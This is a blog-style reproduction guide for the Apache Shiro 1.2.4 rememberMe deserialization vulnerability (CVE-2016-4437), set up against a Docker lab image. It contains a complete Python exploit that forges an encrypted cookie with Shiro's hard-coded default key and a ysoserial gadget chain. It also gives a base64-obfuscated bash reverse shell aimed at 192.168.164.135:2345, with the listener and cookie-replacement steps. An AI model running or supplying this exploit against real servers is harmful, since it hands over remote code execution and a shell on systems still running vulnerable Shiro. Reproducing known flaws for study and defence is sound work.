Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)復現

Preface

For the next while I will be doing vulnerability reproductions and code audits; call it a small goal.

Getting started

Environment setup

The reproduction uses Docker. Start Docker:

systemctl start docker

Pull the image and start the environment:

docker pull medicean/vulapps:s_shiro_1
docker run -d -p 81:8080 medicean/vulapps:s_shiro_1

Apache already occupies port 80 on this CentOS host, so the container is mapped to port 81; change it as you like.

Tool preparation

1. shiro_poc.py

# pip install pycrypto
import sys
import base64
import uuid
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    # Let ysoserial build a CommonsCollections2 gadget chain that runs `command`
    # on deserialization; the serialized object is read from its stdout.
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    # PKCS#7 padding up to the 16-byte AES block size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Hard-coded default rememberMe key shipped with Shiro 1.2.4
    key  = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv   = uuid.uuid4().bytes          # random 16-byte IV
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    # Cookie value = base64(IV || ciphertext), the layout Shiro decrypts
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

Put this script in the /tmp directory.

2. The ysoserial jar file

Install git:

apt-get install git

Install Maven:

wget https://downloads.apache.org/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

cd /usr/local
tar -zxvf apache-maven-3.6.3-bin.tar.gz
vi /etc/profile
# append these two lines to /etc/profile
export MAVEN_HOME=/usr/local/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH
source /etc/profile
mvn -v

Edit /usr/local/apache-maven-3.6.3/conf/settings.xml, find the mirrors node and add the Aliyun mirror:

<mirrors>
    <mirror>
        <id>alimaven</id>
        <name>aliyun maven</name>
        <url>http://maven.aliyun.com/nexus/content/groups/public/</url>
        <mirrorOf>central</mirrorOf>
    </mirror>
</mirrors>

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests
cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp

Install the Python module:

pip3 install pycrypto

Running it

The command to execute:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx is the base64 encoding of: bash -i >& /dev/tcp/192.168.164.135/2345 0>&1

Start the listener, then generate the payload:

nc -lvvp 2345
python3 shiro_poc.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzUvMjM0NSAwPiYx}|{base64,-d}|{bash,-i}"

payload.cookie will be created under /tmp.
Open the site in the browser, log in, click "account page" and capture the request.
Replace the entire contents of the Cookie header with the contents of payload.cookie.
Go back to the listener.
A shell has been obtained.

References

https://paper.seebug.org/shiro-rememberme-1-2-4/#0x01
https://www.cnblogs.com/paperpen/p/11312671.html
https://www.cnblogs.com/tr1ple/p/11662193.html
